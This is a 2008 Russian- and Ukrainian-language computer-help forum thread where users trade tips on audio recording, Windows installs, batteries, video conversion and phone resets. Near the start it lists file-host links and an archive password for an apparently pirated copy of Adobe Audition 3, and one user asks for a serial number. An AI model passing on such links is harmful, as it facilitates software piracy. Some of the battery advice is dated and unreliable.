я все оч упростил...но если нужно добиться немного плотнее звучания..и качества..можно повешать переведенный микс на vst- Izotope Ozone и подогнать с помощью встроенных плагин..или даж примитивно по готовым пресетам...
удачи в начинаниях!
спс! :)
учи матчасть!
2 Борода
в раздел Rap/Hip-hop
А епт! Не нужно проявлять свою обознанность при первой же возможности. А тем более,НЕ НУЖНО УКАЗЫВАТЬ МНЕ,ЧТО ДЕЛАТЬ!
О чем ты можешь говорить и какого ты рассказываешь,если не знаешь ни производителя,ни характеристик,ни цены того микрофона,что в наушниках,бля?!
А епт! Не нужно проявлять свою обознанность при первой же возможности. А тем более,НЕ НУЖНО УКАЗЫВАТЬ МНЕ,ЧТО ДЕЛАТЬ!
О чем ты можешь говорить и какого ты рассказываешь,если не знаешь ни производителя,ни характеристик,ни цены того микрофона,что в наушниках,бля?!
парни, не ругайтесь .... у каждого из нас свой опыт , свои наработки, свои успехи и неудачи ...и ругань ни к чему не приведет ..... я все равно перепробую все варианты
спасибо за помощь:)
начнем с того что я в этом деле не одни и не 2 года..
все наушники с микро практически с идентичными характеристиками звукоснимания...
т.е единственное отличие это качесвто самих наушников...а микро практически везде идентичен..
..
че мне узнавать..я уже не одни такие уши...а с 10-ток поменял..и знаю..что по этому поводу не надо париться..если руки прямые, слух имеется и элементарные знания об обработкае и физике звука ..можно с гавна сделать КАНХВЭТУ:cool:
парни, не ругайтесь .... у каждого из нас свой опыт , свои наработки, свои успехи и неудачи ...и ругань ни к чему не приведет ..... я все равно перепробую все варианты
спасибо за помощь:)
да я и не настроен на ссорры..просто не люблю когда люди советуют..то в чем полностью не обознаны..
ну согласитесь...
будете вы ехать вечером на машине и спросите у прохожего...а как проехать в Одеессу..а чел укажет вам на Львов..обидно ведь потом будет не так ли?..:)
пс. был бы ща който микро..я бы сделал видео урок по элементарной записи и сведению....
ССЫЛКИ НА аДОБ 3
Цитата
http://stealth.to/?id=293o6v7ri7s3q9hgq74mplygfksy4k
Uploaded.to mirror
http://uploaded.to/?id=zyajwx
http://uploaded.to/?id=4gv50g
http://uploaded.to/?id=92w84l
Цитата
ИЛИ
http://depositfiles.com/files/2370671
pword = morz@magesy
Цитата
Или:
http://cjcity.ru/soft/index.php?action=sel...id=69&cat=1
СТАТЕЙКА ПРО АДОБ 2-можно ознакомится с окном прграммы, кнопками и основными их функциями
http://cjcity.ru/news/content/adobe-audition-2.php
начнем с того что я в этом деле не одни и не 2 года..
все наушники с микро практически с идентичными характеристиками звукоснимания...
т.е единственное отличие это качесвто самих наушников...а микро практически везде идентичен..
..
че мне узнавать..я уже не одни такие уши...а с 10-ток поменял..и знаю..что по этому поводу не надо париться..если руки прямые, слух имеется и элементарные знания об обработкае и физике звука ..можно с гавна сделать КАНХВЭТУ:cool:
По крайней мере на солидного эксперта не смахиваешь.
Вообще-то я прекрасно понимаю,что микрофоны для караоке - чуть ли не худший вариант,но я полагаю,что записывать вокал через микрофон на наушниках - вообще дикость. Такого я еще не видал. Да и не представляю,как это можно сделать физически - натянув при этом наушники на голову? Тогда из-за близкого расположения микрофона к губам,ничего кроме придыханий и звуков губ не будет слышно. Так вот,следовательно,я подумал,что если качество записи не сильно важно,то и это не будет иметь принципиального значения,так как "урезание частот" мы не сильно услышим...
На счет последнего предложения - вполне согласен. Только эти споры в принципе бесполезны,так как все,что ниже 100$,дает очень скромный результат.
По крайней мере на солидного эксперта не смахиваешь.
Вообще-то я прекрасно понимаю,что микрофоны для караоке - чуть ли не худший вариант,но я полагаю,что записывать вокал через микрофон на наушниках - вообще дикость. Такого я еще не видал. Да и не представляю,как это можно сделать физически - натянув при этом наушники на голову? Тогда из-за близкого расположения микрофона к губам,ничего кроме придыханий и звуков губ не будет слышно. Так вот,следовательно,я подумал,что если качество записи не сильно важно,то и это не будет иметь принципиального значения,так как "урезание частот" мы не сильно услышим...
На счет последнего предложения - вполне согласен. Только эти споры в принципе бесполезны,так как все,что ниже 100$,дает очень скромный результат.
не ну реально можно записывать!
яраньше и не задумывался..просто выжимыл потом на мастеринге..все что мог...
а на счет микро то таки да...
но опять же мы писали реп-а там спектр голоса практически лежал на одном промежутке частот..может из-за монотонности читки..
а вот если распеваться надо...то надо хотябы...за 350грн - шур..хз кой там..-начальный вокальный...в Аккорде такой лежит....
не ну реально можно записывать!
яраньше и не задумывался..просто выжимыл потом на мастеринге..все что мог...
а на счет микро то таки да...
но опять же мы писали реп-а там спектр голоса практически лежал на одном промежутке частот..может из-за монотонности читки..
а вот если распеваться надо...то надо хотябы...за 350 - шур..хз кой там..-начальный вокальный...в Аккорде такой лежит....
Просто поток воздуха из-зо рта при вокале,думаю,очень картинку подпортит на таком микрофоне,потому я и так сказал... А ты что-то накинулся сразу... Ну да ладно,хватит спорить...
Ты случайно стайловскими драмами не пользуешься?
Просто поток воздуха из-зо рта при вокале,думаю,очень картинку подпортит на таком микрофоне,потому я и так сказал... А ты что-то накинулся сразу... Ну да ладно,хватит спорить...
Ты случайно стайловскими драмами не пользуешься?
всмысле атйловскими?
если ты про последнюю работку на порно дидж..то там стандартные 2 лупа фрутикоских..немного видоизмененных разнесенных по каналам и порезаных..
нме было уж очень впадло прописывать туда бит...
ес иты про это..
а так лупы не уважаю..пишу все сам...
это единичный случай
всмысле атйловскими?
если ты про последнюю работку на порно дидж..то там стандартные 2 лупа фрутикоских..немного видоизмененных разнесенных по каналам и порезаных..
нме было уж очень впадло прописывать туда бит...
ес иты про это..
а так лупы не уважаю..пишу все сам...
это единичный случай
Stylus,я о них - ударные для хопа. Я тоже лупы (и сэмплы) не люблю,а вот там вроде one-shot биты. Вот решил заняться музыкой с примесью хип-хопа и хочу их заиметь,но впадло выкачивать многогиговые библиотеки,проще у кото-то взять,потому и спрашиваю. Ладно тогда,я спать.
AndRey Wild Cat
25.04.2008, 12:11
Программа для багато трекового записуПосоветую лично Adobe AuditionAdobe Audition 3Ось саме це я мав на увазі. :yes:
Ось саме це я мав на увазі. :yes:
и тебе спасибо, добрый человек ! :)
<$<V@DIM>$>
25.04.2008, 17:34
Люди не подскажете имя программки через какую можно восстановить всю утерянную информацию на моб. Телефоне???
А то скинул не параметры на тел. А типа отформатировал полностью (получилось так как будто переустановил винду полностью на ПК)!
AndRey Wild Cat
26.04.2008, 10:01
Люди не подскажете имя программки через какую можно восстановить всю утерянную информацию на моб. Телефоне???
А то скинул не параметры на тел. А типа отформатировал полностью (получилось так как будто переустановил винду полностью на ПК)!
Вже ніяк. :yes:
Николаич
26.04.2008, 12:47
Народ, HELP !!!
Такая проблемка - не могу установить человеку виндовс, перед переустановкой переразбивал жесткий диск, а теперь когда ставлю загрузочный. то после первого этапа появляется черный экран с мигаещим вверху слева курсором и усе.... Комп больше ни на на что не реагирует... Чего делать ?
Ставлю на диск с... Форматировал его тогда, когда и переразбивал программой такой acronis.. Потом сразу поставил его на установку винды и такая вот засада, описанная выше получилась
У меня на компе ставится... Т.е. у меня курсор с черным экраном мигает секунд пять, потом появляется синий экран с текстом где уже предлагаются диски на которые ставить винду и т.п., то есть нормальный процесс... А у товарища этот экран не появляется, все зависает на мигающем курсоре и черном экране
Luchano Frost
26.04.2008, 13:32
Народ, HELP !!!
Такая проблемка - не могу установить человеку виндовс... ТУТ була купа ориггінального тексту А у товарища этот экран не появляется, все зависает на мигающем курсоре и черном экране
Яку вінду ставиш (часом не вісту?)
Николаич
26.04.2008, 13:58
Яку вінду ставиш (часом не вісту?)
обычную, windows xp Себе ставил, все нормально, а у него почему-то трабла...
обычную, windows xp Себе ставил, все нормально, а у него почему-то трабла...Hardware Abstraction Level
обычную, windows xp Себе ставил, все нормально, а у него почему-то трабла...
все элементарно ....при включении компа..нажимаешь много раз del или F2(как на какой материнке) для открытия биос-а...потом во вкладке boot дивайс ...(дивайс приорити на некоторых)- потом должен появиться такой список
1-st boot - HDD
2-nd boot - CD-RW/DVD
3-rd boot - FDD
4-nd...
кароче смысл в чмс..у тебя выкидывает загрузку с винта а так как у тебя нет файла стартующего винду(попросту потому что у тебя чистый диск с)....твоя задача состоит в том..чтобы поменять с HDD на CD/DVD...в 1-st boot
чтобы было так
1-st boot - CD-RW/DVD
2-nd boot - HDD
3-rd boot - FDD
4-nd...
вот и все...
Николаич
26.04.2008, 18:56
Hardware Abstraction Level
с этого места поподробней
Николаич
26.04.2008, 19:00
все элементарно ....
"все элементарно" не проходит
В биосе конечно менял, и перезагружал его два миллиона раз... после синего экрана (вверху "установка Виндовс" написано) и загрузки файлов с диска комп перезагружается, потом появляется курсор на черном экране И ВСЕ....
Когда у себя пробовал, тоже курсор появлялся, но секунд на 5, а тут - навечно... Начинает мигать курсор, потом замолкает дисковод (перестает крутиться) и все... Мэртво
"все элементарно" не проходит
В биосе конечно менял, и перезагружал его два миллиона раз... после синего экрана (вверху "установка Виндовс" написано) и загрузки файлов с диска комп перезагружается, потом появляется курсор на черном экране И ВСЕ....
Когда у себя пробовал, тоже курсор появлялся, но секунд на 5, а тут - навечно... Начинает мигать курсор, потом замолкает дисковод (перестает крутиться) и все... Мэртво
а ти в себе цим же диском пробував ставити? чи може іншим?...
Николаич
26.04.2008, 20:06
а ти в себе цим же диском пробував ставити? чи може іншим?...
Этим же диском, каким же еще... в тот же день.. у меня все пошло
...Мастер...
26.04.2008, 22:39
чем можна пакетно уменьшить фото?
чем можна пакетно уменьшить фото?IrfanView
с этого места поподробнейвинда не может создать HAL для твоей машины, в том месте, о котором ты говоришь, винда создает hal.sys.
чем можна пакетно уменьшить фото?
ACDSee
Николаич
27.04.2008, 12:36
винда не может создать HAL для твоей машины, в том месте, о котором ты говоришь, винда создает hal.sys.
чем ей помочь ?
чем ей помочь ?:confused: где-то в инсталляторе есть функция выбора стандартного HAL. входящего в дистр винды, их там должно быть несколько, тебе нужно что-то вроде компьютер с ACPI, и, в зависимости, от количества ядер однопроцессорный или многопроцессорный, может помочь, а могут быть и конфликты в железе. Это теоретические прикидки, но как оно может быть на самом деле, фиг его знает.
Как увеличить срок службы аккумулятора?
AndRey Wild Cat
28.04.2008, 02:54
Как увеличить срок службы аккумулятора?Вони бувають різні! :rolleyes:
telltale
28.04.2008, 11:37
Как увеличить срок службы аккумулятора?
Стандартное правило - заряжать только при полном разряде.
(хотя некоторых современных аккумуляторов это не касается)
Стандартное правило - заряжать только при полном разряде.
(хотя некоторых современных аккумуляторов это не касается)
:yes:...всіх стосуєтьється даж літій йонних і полімерних....просто цих видів стосується в меншій мірі.....
ше можна додати: довгий час акумулятор не тримати в розрядженому стані, не перезаряджати(краще недозарядити чим перезарядити), заряжати при кімнатній температурі(при холоді заряд не буде братися, а при жарі заряд швидко втрачається) ну і зберігати акум теж тре при кімнатній температурі і в темному місці(щоб промені сонця його не підігрівали)....заряджати краще імпульсним струмом(можна чередувати заряд постійним, а заряд імпульсним)-так буде зберігатися ємність акумулятора.....
як згадаю ще щось допишу....
то Jason про який вид акумуляторів іде мова?
Вони бувають різні! :rolleyes:
то Jason про який вид акумуляторів іде мова?
Li-Ion...
AndRey Wild Cat
28.04.2008, 12:30
Вони бувають різні! :rolleyes:Якщо автомобільні читай оце:
http://www.autoprostor.ru/useful/useful_4.html
http://www.avtomobilistam.ru/advice/accumulator-long-exploit.htm
Для мобільних:
http://bb.ct.kz/index.php?showtopic=88943
http://www.101mobi.com/polezn.php
http://www.onliner.ua/technologies/phones/battery/
Загалом читай тута:
http://www.bestadaptor.at.ua/news/2008-01-28-54
З.І.Юзаємо гуглю і радуємось життю... :?)
Якщо автомобільні читай оце:
http://www.autoprostor.ru/useful/useful_4.html
http://www.avtomobilistam.ru/advice/accumulator-long-exploit.htm
Для мобільних:
http://bb.ct.kz/index.php?showtopic=88943
http://www.101mobi.com/polezn.php
http://www.onliner.ua/technologies/phones/battery/
Загалом читай тута:
http://www.bestadaptor.at.ua/news/2008-01-28-54
З.І.Юзаємо гуглю і радуємось життю... :?)
Спасибо...
Ещё один вопрос...
Какая программа показывает все открытые порты, и расписывает что это за порты...
А то бывает, модем (Arris) начинает моргать так, как-будто откуда-то что-то интенсивно качает...
Существует ли эмулятор 3х шейдеров?
AndRey Wild Cat
28.04.2008, 21:03
Спасибо...
Ещё один вопрос...
Какая программа показывает все открытые порты, и расписывает что это за порты...
А то бывает, модем (Arris) начинает моргать так, как-будто откуда-то что-то интенсивно качает...ФаєрВолл :yes:
ТАКАЯ проблема когда включаю игру начинает шото вонять в компе и он тупо вірубаецо...думаю перегреваецо чтото..
Когда сижу в нете особо нічё не делаю то работает....а когда ігру запускаю 10 минут і капец ...
AndRey Wild Cat
28.04.2008, 21:18
ТАКАЯ проблема когда включаю игру начинает шото вонять в компе и он тупо вірубаецо...думаю перегреваецо чтото..
Когда сижу в нете особо нічё не делаю то работает....а когда ігру запускаю 10 минут і капец ...Відео або проц, скоріш за все охолодження погане чи зупинився кулєр. :yes:
Відео або проц, скоріш за все охолодження погане чи зупинився кулєр. :yes:
Я так и думав.... бо проц гарячий стае дуже.... а скікі прімерно новій кулер стое?
Я так и думав.... бо проц гарячий стае дуже.... а скікі прімерно новій кулер стое?
смотря під який проц....і який кулер:?).....
хотя повонює....блін як воно ше в тебе робе?....
смотря під який проц....і який кулер:?).....
хотя повонює....блін як воно ше в тебе робе?....
Як бачіш сіжу....може це пилюка горіла воняе?
Существует ли эмулятор 3х шейдеров?:no::no: :no:у третьих шейдеров совершенно другая структура с точки зрения их создания, поэтому не думаю, что что-то такое может существовать, хотя, чем черт не шутит =)
Magnetto
29.04.2008, 08:30
Существует ли эмулятор 3х шейдеров?
существуют программы , отключающие опцию 3х шейдеров в играх , тот же OLDblivion
существуют программы , отключающие опцию 3х шейдеров в играх , тот же OLDblivion
в инете все как сговорились, 3д Анализ предлагают и всё. он отключает всего 1\1.4\2 шейдера.
OLDBlivion для игры Обливион, а не для любой другой.
Magnetto
29.04.2008, 09:24
в инете все как сговорились, 3д Анализ предлагают и всё. он отключает всего 1\1.4\2 шейдера.
OLDBlivion для игры Обливион, а не для любой другой.
я навел для примера олдбливион ... возможно и для других задач есть похожие программы
Здравствуйте!
Вопрос:
Что может быть с настройками памяти не так, если она показывает 504 мб вместо 512 и явно пашет медленнее..
память ддр1 Самсунг оригинал 512 мб...
Может, что то в тайминге проставить надо?
подскажите правильные значения в БИОСе, ато я в этом немного нулевой..(
зараннее благодарен...жду
Здравствуйте!
Вопрос:
Что может быть с настройками памяти не так, если она показывает 504 мб вместо 512 и явно пашет медленнее..
память ддр1 Самсунг оригинал 512 мб...
Может, что то в тайминге проставить надо?
подскажите правильные значения в БИОСе, ато я в этом немного нулевой..(
зараннее благодарен...ждуноутбук?
ноутбук?
нет пк...
мамка ASRock P4i45GV
Чипсет системной платы Intel Brookdale-G i845GEV
Тип BIOS AMI (02/15/06)
сволочь..уже 503мб((че за фигня то?
нет пк...
мамка ASRock P4i45GV
Чипсет системной платы Intel Brookdale-G i845GEV
Тип BIOS AMI (02/15/06)
сволочь..уже 503мб((че за фигня то?
для начала memtestx86 :yes:
для начала memtestx86 :yes:
что поконкретнее от меня требуется?
есть прога эверест..мож с нее кието данные нужны?
что поконкретнее от меня требуется?
есть прога эверест..мож с нее кието данные нужны?
для начала скажи какое видео у тебя стоит?
для начала скажи какое видео у тебя стоит?
емае...вроде не ламер..но не секу к чему тут видео к оператве?
интегршка видео..
я ж назвние мамки дал..там окончание на это указывает
James Bond
30.04.2008, 18:53
емае...вроде не ламер..но не секу к чему тут видео к оператве?
интегршка видео..
я ж назвние мамки дал..там окончание на это указывает
- Интегрированный контроллер Intel® Extreme Graphics
- Макс. объем памяти 64 Мб
Угадай откуда эти мбайты, берутся.
:lol:
- Интегрированный контроллер Intel® Extreme Graphics
- Макс. объем памяти 64 Мб
Угадай откуда эти мбайты, берутся.
:lol:
нифигасебе....это че если видяха загрузится полностью - то у меня останется...448 метров оперы?:eek:
нифигасебе....это че если видяха загрузится полностью - то у меня останется...448 метров оперы?:eek:
да....но цікаво чого вона сразу всі 64 мега не забирає?.....
да....но цікаво чого вона сразу всі 64 мега не забирає?.....
типо динамическая загрузка )
типо динамическая загрузка )
таки да:yes:оно когда как..
для обчного инет эксплоэра и прочей белебирды типа винампа-хватает 8-9 метров)
ВСЕМ, КТО ПОМОГ ОБЬЯВЛЯЕТСЯ БЛАГОДАРНОСТЬ!:)
Хтось знає назву проги яка перетворює файли з дежавю в пдф?....дякую....
такая проблема, у меня струйник, Canon IP 1500, черный цвет печатает без проблем, а вот с цветными проблемы (иногда забываю прокатывать страницу, и сопла подсыхают...) так вот сейчас желтый цвет исчез (катридж новый поставил!). Я когда-то возил принтер на фирму, они так головку ложили в какой-то раствор на пару дней, чтоб отмокла и потом было все ок. Может кто-то в курсе, что это за раствор???
такая проблема, у меня струйник, Canon IP 1500, черный цвет печатает без проблем, а вот с цветными проблемы (иногда забываю прокатывать страницу, и сопла подсыхают...) так вот сейчас желтый цвет исчез (катридж новый поставил!). Я когда-то возил принтер на фирму, они так головку ложили в какой-то раствор на пару дней, чтоб отмокла и потом было все ок. Может кто-то в курсе, что это за раствор???
спирт, сам так делал
Хтось знає назву проги яка перетворює файли з дежавю в пдф?....дякую....из дежавю можно в док, а потом уже в пдф :confused:
Чем кроме Ниро вишн можно перевести файлы двд-формата(сериал)*.vob - в ави...(чтоб видик поддерживал)
вот скрин папки....
Werewolf
02.05.2008, 00:24
Чем кроме Ниро вишн можно перевести файлы двд-формата(сериал)*.vob - в ави...(чтоб видик поддерживал)
вот скрин папки....
Im too 3gp video conventer
вот скрин папки....тебе нужны только файлы вида vts_0X_x.vob, остальное не надо, можно DVD-студией висты вымутить, муви мейкером, pocketdivxencoder'ом ))
Im too 3gp video conventer
divx формат ави?
пс. не подкинешь серийный номер к нему-у меня ограниченая версия((
ппс. а как с настройками? как правильно настроить чтобы в качесве не потерять..а примерно тоже место чобы занимало..
2 Ортега
у меня хп...
неодной из этих прог нет((
спс
из дежавю можно в док, а потом уже в пдф :confused:
як?:confused:.......я можу тільки зберігати в бмп.....
divx формат ави?
пс. не подкинешь серийный номер к нему-у меня ограниченая версия((
ппс. а как с настройками? как правильно настроить чтобы в качесве не потерять..а примерно тоже место чобы занимало..
2 Ортега
у меня хп...
неодной из этих прог нет((
спс
pcoketdivxencoder 7 метров весит, штука, чтоб кодить видео в дивикс под различные устройства, муви мейкер в икспи тож есть
як?:confused:.......я можу тільки зберігати в бмп.....
распознать
pcoketdivxencoder 7 метров весит, штука, чтоб кодить видео в дивикс под различные устройства, муви мейкер в икспи тож есть
спс....а как там с настройками?
пс.я в курсе, что еть...но уменя точно нет...хп-ха урезанная
распознать
не я так тож знаю і це довго....а та прога робила в пдф який зразу можна було відкривати в файнрідері....ладно будім іскать.....
не я так тож знаю і це довго....а та прога робила в пдф який зразу можна було відкривати в файнрідері....ладно будім іскать.....http://www.dpk.com.ua/forum/10386.html, имхо, полезная ветка
спс....а как там с настройками?
пс.я в курсе, что еть...но уменя точно нет...хп-ха урезанная поставь PC, должно подойти, главное, не втыкни с соотношением сторон
James Bond
02.05.2008, 08:37
вот скрин папки....
запиши проект двд-видео в неро, и будет тебе счастье
эти файлы помещаешь в папку видео_тс
остальное не трогаем
любой двд-плеер должен читать
не я так тож знаю і це довго....а та прога робила в пдф який зразу можна було відкривати в файнрідері....ладно будім іскать.....
даю наводку..... напечатай djvu в pdf
даю наводку..... напечатай djvu в pdf
спс....я вже найшов прогу PDFCreator....канешно удобства мало....:|з мегового файла робить 9 мегов....но то фігня....
блін скачав потрібний файл дежавю....відкриваю а воно мені видає такі помилки(на скрінах)....типу ця версія дежавю не може відкрити цей файл....я скачав нові версії....всі вони видають такі ж помилки....шо ж робити?
кто подскажет человеку, который полный ламер в программирование, как оформить следующее на компе....
A+B=
a) c b) d с)....
то есть, чтобы человек нажимал соответствующую букву\ вариант ответа и потом считалось количество правильных\неправильных ответов.
спасибо.
кто подскажет человеку, который полный ламер в программирование, как оформить следующее на компе....
A+B=
a) c b) d с)....
то есть, чтобы человек нажимал соответствующую букву\ вариант ответа и потом считалось количество правильных\неправильных ответов.
спасибо.
cout << "A+B=" ;
cin >> cAnswer;
switch(cAnswer){
сase a:{iResult++; break;} // if a is correct
case b:{break;}
case c:{break;}
}
примитивно.... но основной функциональность должно обеспечить..... но думаю придётся дорабатывать ещё
други, помогите мне, ламеру. скажите, как имея винт на 80 гиг, разбить его на три диска (C, D, E)?
спасибо.
други, помогите мне, ламеру. скажите, как имея винт на 80 гиг, разбить его на три диска (C, D, E)?
спасибо.
PartitionMagic:)....
Помогите найти прошивку!
Canyon CNR-MPV4AG
мп4 плеер
он тупо умер...ошибка 41:cry:
зараннее спасибо:yes:
James Bond
04.05.2008, 11:28
Помогите найти прошивку!
Canyon CNR-MPV4AG
мп4 плеер
google.com
Помогите найти прошивку!
Canyon CNR-MPV4AG
мп4 плеер
а на сайті виробника дивився?.....там має бути:yes:....
Кто знает, есть ли на Киевской компьютерные фирмы?
Не считая Символа...
Werewolf
05.05.2008, 00:00
Кто знает, есть ли на Киевской компьютерные фирмы?
Не считая Символа...
Арго,Гайтер,Компьютеры и орг техника(Ближе к "Визиту")И возле автовокзала есть на третий этаж поднятьься!
Арго,Гайтер,Компьютеры и орг техника(Ближе к "Визиту")И возле автовокзала есть на третий этаж поднятьься!
Можно телефончики и точные адреса этих фирм?
Хтось знає назву проги яка перетворює файли з дежавю в пдф?....дякую....
найшов прогу:)....дежавюдекодер....напряму конвертує в тіфф чи бмп чи в jpg прийнятної якості.....кому тре звертайтеся, я відправлю на мило.....
Житель_Планеты_Земля
06.05.2008, 01:44
Есть програмка - VirtualDub 1.7.8
Есть mpeg4 файлик с расширением mp4.
Програмка не открывает файлик.
Как это можно исправить?
З.Ы. Установлен самый свежий пакет кодеков от kLite.
AndRey Wild Cat
06.05.2008, 06:45
Как это можно исправить?
Спробуй пошукати 3gp Video Converter, і ним перекодувати в інший формат, який читає Віртуал Дуб ;)
Житель_Планеты_Земля
06.05.2008, 07:39
Как это можно исправить?
Всем спасибо за помощ.
Програмка VirtualDub была заменена на AnyVideoConverter.
Все работает просто волшебно.
Еще раз всем спасибо.
В общем, такая вот трабла: во всех сетевых геймах я не вижу никого в сети, а меня видят. Когда отключаю смарт соединения, я всех вижу и меня видят.. но при этом я, к примеру, не могу одновременно закачку держать. Кто что посоветует?
В общем, такая вот трабла: во всех сетевых геймах я не вижу никого в сети, а меня видят. Когда отключаю смарт соединения, я всех вижу и меня видят.. но при этом я, к примеру, не могу одновременно закачку держать. Кто что посоветует?
Какой антивирус?
Какой антивирус?
KIS 7.0
Не в антивирусе дела. Отключал. В самой настройке сети. Как отделить смартовский ИП, что бы он не отображался в лок. сети.. вот в чем трабла.
KIS 7.0
Не в антивирусе дела. Отключал. В самой настройке сети. Как отделить смартовский ИП, что бы он не отображался в лок. сети.. вот в чем трабла.
Получается, что одно сетевое соединение хочет использовать два разных ИПа?
По-моему, выход один — менять железо. Две сетевых карты(одна видит инет, другая локалку) или ставить свич(принимает и инет, и сетку). Первый вариант предпочтительнее; смартовский модем должен работать через сетевой кабель, а не USB.
Спробуй пошукати 3gp Video Converter, і ним перекодувати в інший формат, який читає Віртуал Дуб ;)
XVID4PSP покруче будет. :yes: Принимает все и выдает все. Плюс, может сразу же фильтровать картинку и звук и накладывать субтитры.
http://winnydows.com/
Житель_Планеты_Земля
06.05.2008, 19:18
XVID4PSP покруче будет. :yes: Принимает все и выдает все. Плюс, может сразу же фильтровать картинку и звук и накладывать субтитры.
http://winnydows.com/
http://forum.vn.ua/showpost.php?p=2317972&postcount=7467
Pomogite pojaluista! :cry:
Y menia politel vinchester! :cry:
Tam mnogo cenoy informacii! :cry:
Gde mojno vostanovit"!?
P.S.: Izvenite, ruskaya raskladka ne rabotaet!
Gde mojno vostanovit"!?
С какого этажа полетел? ;)
Если винт Самсунг и ему менее трех лет, то с него бесплатно восстановят информацию в ближайшем сервисном центре Самсунг.
Иначе, можешь поспрашивать в конторах, которые собирают ПК.
AndRey Wild Cat
07.05.2008, 09:49
Gde mojno vostanovit"!?
P.S.: Izvenite, ruskaya raskladka ne rabotaet!Я як саме? Він не згорів? Його не форматували після того? :rolleyes: Який розмір вінта?
Gde mojno vostanovit"!?
Гріол
м. Вінниця, вул. 600-річчя, 25, оф.14
8(0432)65-64-17
www.griol.com
Відновлення інформації з будь-яких жорстких дисків і FLASH носіїв, ремонтуємо цифрові фотоапарати, ноутбуки.
Они этим занимаются... Давно...
Я як саме? Він не згорів? Його не форматували після того? :rolleyes: Який розмір вінта?
Vint nebolshoy perenosnoy!
Na 80 Gb realno tam 76 Gb!
Svobodno 14 Gb!
Vunimal cherez bezopasniy rejim!
Vint ne hotel otkluchatsa i vutinul shur!
Ne formatiroval!
V total Comand"ere pishet "Net disketu ili disk ne nayiden"!
A cherez My computer pishet "Nevozmojno naity oborudovanie vozmojno fail ili papka povrejdenu"!
Vse spasibo!
Svobodno 14 Gb!
Ne formatiroval!
A cherez My computer pishet "Nevozmojno naity oborudovanie vozmojno fail ili papka povrejdenu"!
Vse spasibo!такая фигня бывает, когда запрашиваешь файл, который расположен на неподключенном диске, ты его хоть подключил, когда файл запрашивал? я его без безопасного достаю, никаких проблем
такая фигня бывает, когда запрашиваешь файл, который расположен на неподключенном диске, ты его хоть подключил, когда файл запрашивал? я его без безопасного достаю, никаких проблем
Da podkluchil! Lampochka svetitsa! I v My computer ego vidit i ne hochet otkrivatsa!
AndRey Wild Cat
08.05.2008, 00:29
Svobodno 14 Gb!
Ne formatiroval!
Vse spasibo!Якщо дуже треба, можу відновити інфу... :yes: Якшо шо катай в ПС
может кто знает в чём проблема- плеер включается, но екран не горит:confused: :cry: :cry:
может кто знает в чём проблема- плеер включается, но екран не горит:confused: :cry: :cry:
Уточни, какой плейер, т.к. они бывают разные: программные, "железные", портативные, стационарные и т.д.. ;)
<$<V@DIM>$>
08.05.2008, 11:29
Люди какой ПОРТ на смарте? нада номер правильный
Люди какой ПОРТ на смарте? нада номер правильный
СМАРТ открытые порты не предоставляет.
Уточни, какой плейер, т.к. они бывают разные: программные, "железные", портативные, стационарные и т.д.. ;)
мр4 multi - media player Sony large apple :confused:
:cry:экран не включается
Скорее всего, отклеился шлейф экранчика. Занеси в сервисный центр, там его мигом вернут на место. :)
Скорее всего, отклеился шлейф экранчика. Занеси в сервисный центр, там его мигом вернут на место. :)
ты не знаешь где этот центр? и приблизительно хоть сколько это будет стоеть?
ты не знаешь где этот центр? и приблизительно хоть сколько это будет стоеть?
Знает отец, я — нет.
Можешь спросить в магазине, где ты покупала плейер, либо в Цифре напротив Универмага — у них стенд с фирменной продукцией Sony.
Знает отец, я — нет.
Можешь спросить в магазине, где ты покупала плейер, либо в Цифре напротив Универмага — у них стенд с фирменной продукцией Sony.
:) спасибо за помощь:kiss:
:) спасибо за помощь:kiss:
Не за что. :rose: :)
Ты уверена, что это фирменный Сони?? Какая цена плеера?? Гарантия еще есть?
вопрос актуален.
что это за жидкость???
Roadkill
08.05.2008, 20:20
Посоветуйте който простой видеоредактор типа Movie maker'a.
UPD:желательно с сылкой:yes:
Помогите найти прошивку!
Canyon CNR-MPV4AG
мп4 плеер
он тупо умер...ошибка 41
зараннее спасибо
а на сайті виробника дивився?.....там має бути....смотрел....там только мануалы в пдф...дров нет(((
google.com
ха ха....
я все изгуглил - ссылки мертвы((
пс.2 ВСЕ..
вопрос все еще актуален!
нужна прошивка к Canyon CNR-MPV4AG
мп4 плеер
Помогите найти прошивку!
Canyon CNR-MPV4AG
мп4 плеер
он тупо умер...ошибка 41
зараннее спасибо
смотрел....там только мануалы в пдф...дров нет(((
ха ха....
я все изгуглил - ссылки мертвы((
пс.2 ВСЕ..
вопрос все еще актуален!
нужна прошивка к Canyon CNR-MPV4AG
мп4 плеер
http://www.canyon-tech.it/support/drivers?NODE_ID=70321073845058822&ITEM=70921061318987592
Оно?
Посоветуйте който простой видеоредактор типа Movie maker'a.
UPD:желательно с сылкой:yes:
Не совсем простой, но разобраться можно: http://www.adobe.com/products/aftereffects/?promoid=BPDDW
ЗЫ: В нем делали конечную картинку фильма "300". =)
вопрос актуален.
что это за жидкость???
Жидкость для промывки! (ТАК И НАЗЫВАЕТСЯ)
Жидкость для промывки! (ТАК И НАЗЫВАЕТСЯ)
у нас в Виннице реально приобрести??? не в курсе, какая примерно цена (просто интересно, стоит ли самому возиться, или на фирму нести)
у нас в Виннице реально приобрести??? не в курсе, какая примерно цена (просто интересно, стоит ли самому возиться, или на фирму нести)
Подойди (или позвони) на любую компьютерную фирму, и спроси жидкость для промывки картрижей на Canon...
James Bond
12.05.2008, 19:45
200 мл
18-25 грн
можно купить в лабиринте, что на трол. остановке (ехать с вишенки на зал вокзал) на Урожае
У меня такой вопрос: как сделать так, что бы можно было напрямую записывать сигнал, который подается на колонки, в программах звукозаписи(например SoundForge), то есть не приставляя микрофон к динамикам?
LangonieR
17.05.2008, 00:10
гиде взять ключиг для бумажника в 6230i? :uups:
гиде взять ключиг для бумажника в 6230i? :uups:
може попробувати заводскі настройки...і не тре буде ключа....
AndRey Wild Cat
17.05.2008, 05:05
може попробувати заводскі настройки...і не тре буде ключа....Головне перед цим, (якщо є) пароль на ММС зняти... а то усяке може трапитись... і потім карта може заблокуватись... :yes:
LangonieR
18.05.2008, 00:13
може попробувати заводскі настройки...і не тре буде ключа....де их взять? ))
PS. я удалял всю инфу с бумажника и ключ (*#7370925538#), не помогает
Головне перед цим, (якщо є) пароль на ММС зняти... а то усяке може трапитись... і потім карта може заблокуватись... :yes:
на флешку пароль я не ставил:)
де их взять? ))
PS. я удалял всю инфу с бумажника и ключ (*#7370925538#), не помогает
де де "настройки телефона" і "Стандартные настройки"....запросе код по замовчуваню 12345, якщо його ніхто не поміняв.....
